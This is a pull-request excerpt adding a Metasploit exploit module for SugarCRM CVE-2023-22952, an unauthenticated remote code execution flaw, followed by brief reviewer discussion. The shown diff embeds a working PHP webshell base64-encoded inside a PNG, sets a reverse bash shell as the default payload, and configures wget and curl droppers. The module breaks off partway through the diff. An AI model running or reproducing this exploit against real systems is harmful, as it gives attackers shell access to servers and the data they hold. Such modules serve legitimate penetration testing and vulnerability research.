modules/exploits/linux/http/sugarcrm_webshell_cve_2023_22952.rb

```diff
@@ -0,0 +1,247 @@
+##
+
+require 'securerandom'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  # Base64 PNG webshell code. Credits to sw33t.0day
+  # <?php echo "#####"; passthru(base64_decode($_POST["c"])); echo "#####"; ?>
+  PNG_B64_WEBSHELL = 'iVBORw0KGgoAAAANSUhEUgAAABkAAAAUCAMAAABPqWaPAAAAS1BMVEU8P3BocCBlY2hvICIjIyMjIyI7IHBhc3N0aHJ1KGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJjIl0pKTsgZWNobyAiIyMjIyMiOyA/PiD2GHg3AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAKklEQVQokWNgwA0YmZhZWNnYOTi5uHl4+fgFBIWERUTFxCXwaBkFQxQAADC+AS1MHloSAAAAAElFTkSuQmCC'.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SugarCRM unauthenticated Remote Code Execution (RCE)',
+        'Description' => %q{
+          This module exploits a Remote Code Execution vulnerability that has been identified in the SugarCRM application.
+          Using a specially crafted request, custom PHP code can be uploaded and injected through the EmailTemplates because of missing input validation.
+          Any user privileges can exploit this vulnerability and it results in access to the underlying operating system with the same privileges
+          under which the web services run (typically user www-data). 
+          SugarCRM 11.0 Professional, Enterprise, Ultimate, Sell and Serve versions 11.0.4 and below are affected. Fixed in release 11.0.5 
+          SugarCRM 12.0 Enterprise, Sell and Serve versions 12.0.1 and below are affected. Fixed in release 12.0.2.
+        },
+        'Author' => [
+          'Sw33t.0day', # discovery
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2023-22952' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2022/Dec/31' ],
+          [ 'URL', 'https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/' ],
+          [ 'URL', 'https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update' ],
+          [ 'URL', 'https://attackerkb.com/topics/E486ui94II/cve-2023-22952' ],
+          [ 'PACKETSTORM', '170346' ]
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'unix',
+        'Privileged' => false,
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ ARCH_X64 ],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget', 'curl' ],
```

Comment:
Since you're dropping a webshell, can you not execute multiple commands and thus use the other flavors as well like bourne and printf?

Reply:
Let me check if those other flavors will work.

Reply:
Add flavors and tested successfully. See https://github.com/rapid7/metasploit-framework/pull/17507/commits/04f8d62c43c22ef899b5a9fcba4567bc9ad025a3